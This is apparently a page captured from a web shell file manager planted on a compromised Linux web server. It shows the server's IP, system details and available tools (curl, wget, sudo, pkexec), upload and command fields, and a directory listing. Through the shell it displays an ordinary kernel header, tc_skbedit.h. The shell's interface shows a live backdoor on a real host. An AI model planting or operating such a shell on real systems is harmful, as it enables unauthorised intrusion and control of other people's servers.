p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/modules/3.10.0-1160.119.1.el7.x86_64/build/include/net/tc_act/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/lib/modules/3.10.0-1160.119.1.el7.x86_64/build/include/net/tc_act/tc_skbedit.h
/*
 * Copyright (c) 2008, Intel Corporation.
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms and conditions of the GNU General Public License,
 * version 2, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
 * more details.
 *
 * You should have received a copy of the GNU General Public License along with
 * this program; if not, see <http://www.gnu.org/licenses/>.
 *
 * Author: Alexander Duyck <alexander.h.duyck@intel.com>
 */

#ifndef __NET_TC_SKBEDIT_H
#define __NET_TC_SKBEDIT_H

#include <net/act_api.h>
#include <linux/tc_act/tc_skbedit.h>

struct tcf_skbedit {
	struct tc_action	common;
	u32		flags;
	u32		priority;
	u32		mark;
	u32		mask;
	u16		queue_mapping;
	u16		ptype;
};
#define to_skbedit(a) ((struct tcf_skbedit *)a)

/* Return true iff action is mark */
static inline bool is_tcf_skbedit_mark(const struct tc_action *a)
{
#ifdef CONFIG_NET_CLS_ACT
	if (a->ops && a->ops->type == TCA_ACT_SKBEDIT)
		return to_skbedit(a)->flags == SKBEDIT_F_MARK;
#endif
	return false;
}

static inline u32 tcf_skbedit_mark(const struct tc_action *a)
{
	return to_skbedit(a)->mark;
}

#endif /* __NET_TC_SKBEDIT_H */
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
September 29 2025 07:01:24
0 / 0
0755
tc_connmark.h
0.252 KB
November 06 2023 09:15:52
0 / 0
0644
tc_csum.h
0.545 KB
November 06 2023 09:15:52
0 / 0
0644
tc_defact.h
0.233 KB
November 06 2023 09:15:52
0 / 0
0644
tc_gact.h
1.29 KB
November 06 2023 09:15:52
0 / 0
0644
tc_ife.h
1.99 KB
November 06 2023 09:15:52
0 / 0
0644
tc_ipt.h
0.278 KB
November 06 2023 09:15:52
0 / 0
0644
tc_mirred.h
0.922 KB
November 06 2023 09:15:52
0 / 0
0644
tc_nat.h
0.274 KB
November 06 2023 09:15:52
0 / 0
0644
tc_pedit.h
1.418 KB
November 06 2023 09:15:52
0 / 0
0644
tc_sample.h
1.006 KB
November 06 2023 09:15:52
0 / 0
0644
tc_skbedit.h
1.357 KB
November 06 2023 09:15:52
0 / 0
0644
tc_skbmod.h
0.747 KB
November 06 2023 09:15:52
0 / 0
0644
tc_tunnel_key.h
1.801 KB
November 06 2023 09:15:52
0 / 0
0644
tc_vlan.h
1.241 KB
November 06 2023 09:15:52
0 / 0
0644